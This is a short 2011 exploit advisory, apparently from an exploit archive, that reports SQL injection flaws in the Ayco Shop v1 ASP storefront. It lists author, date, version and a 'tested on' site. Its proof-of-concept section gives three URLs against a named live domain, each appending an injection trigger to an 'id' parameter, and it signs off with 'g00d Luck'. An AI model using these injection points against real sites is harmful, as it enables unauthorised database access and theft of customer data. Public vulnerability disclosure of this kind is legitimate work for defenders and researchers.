# Exploit Title: Ayco Shop v1 SQL Injection Vulnerability # Google Dork: n/a # Date: 17.09.2011 #Author: m3rciL3Ss # Software Link:http://www.ay-computer.com.tr/sanalmagazashopveemlakportal.asp #Version:v1 # Tested on:http://www.aycoshop.com/v1/default.asp ################################ ===[ POC ]=== [»] http://www.aycoshop.com/v1/urundetay.asp?id=21%28%29 [»] http://www.aycoshop.com/v1/default.asp?getir=urunler&id=39%28%29 [»] http://www.aycoshop.com/v1/linkler.asp?id=2%28%29 g00d Luck ################################ Thanks :TuBiGu and Bgh7 m3rciL3Ss@w.cn